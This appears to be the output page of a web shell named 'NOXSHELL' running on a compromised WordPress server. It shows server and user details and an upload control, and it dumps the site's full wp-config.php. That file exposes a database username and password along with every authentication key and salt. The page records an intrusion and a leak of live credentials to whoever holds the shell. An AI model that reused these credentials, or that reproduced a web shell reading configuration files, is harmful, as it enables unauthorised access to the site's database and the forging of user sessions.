NOXSHELL
Server: nginx/1.26.3
System: Linux vultr 6.8.0-54-generic #56-Ubuntu SMP PREEMPT_DYNAMIC Sat Feb 8 00:37:57 UTC 2025 x86_64
User: gisha-group (1019)
PHP: 8.0.30
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /home/gisha-group/htdocs/gisha-group.com/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'gisha-group' );

/** Database username */
define( 'DB_USER', 'gisha-group' );

/** Database password */
define( 'DB_PASSWORD', 'n1PwQbHnQorHDpflTQhm' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1:3306' );

/** Database charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The database collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          '+$(nK}_{i0zV<)n**rU-gsnL?>y#m8iV(^|X_Uhbl!8Pdcz9gn P<g}:4~m6XS@5' );
define( 'SECURE_AUTH_KEY',   '=+5D.bQ:jRcH;aAaY7x0vg(fqLlqXcCw>oy:f/2Peww0m9^MOca5!PE.y_L<f.co' );
define( 'LOGGED_IN_KEY',     '$*DM}DEX)]q=mLT8PsT4bDVleeus!C7uu*^Wq)Nc/pkvjTZsl>lqI{A!roNWa_,g' );
define( 'NONCE_KEY',         'VI@X^NqeSN;9ZW[-xw3-0Btv3:^Fze!|TVzt^1k_A@At/ZrGd]Y)`?CjVhJ[llsm' );
define( 'AUTH_SALT',         'blODvsHtSKrFe%<zhy962QHqB!1mxM{]>G3/E{El&`u9YCovyK)1Cy7>>3,mtQkd' );
define( 'SECURE_AUTH_SALT',  '[/p=sIOCb^BPE| }R%,cLvNLw{6<<oMrQ%,?$|L PZ0+6<zz>K;LcNnUoOg~?Rm7' );
define( 'LOGGED_IN_SALT',    '<j@}?hZ4T67pjNr2a].Y-UQS{/sJB|2U@EAw-I|-^k(E}Djg#Ji6iN+gU~7I1V>L' );
define( 'NONCE_SALT',        'uPv$y/vE~2zFetWw@ucJTdQPp9D>v5O4I7*DO_.J>o@$&~ns&`>P^<).l||i%iz~' );
define( 'WP_CACHE_KEY_SALT', '[U~HG__3:A<.VIM^*_<)KzOJPjM.5NxA=dWV&mNo,R@h)H]lA7Mjwv/w934x%Vu/' );


/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );


define('WP_CACHE', false);

/* Add any custom values between this line and the "stop editing" line. */



define( 'FS_METHOD', 'direct' );
define( 'WP_DEBUG_DISPLAY', false );
define( 'WP_DEBUG_LOG', true );
define( 'CONCATENATE_SCRIPTS', false );
define( 'AUTOSAVE_INTERVAL', 600 );
define( 'WP_POST_REVISIONS', 5 );
define( 'EMPTY_TRASH_DAYS', 21 );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';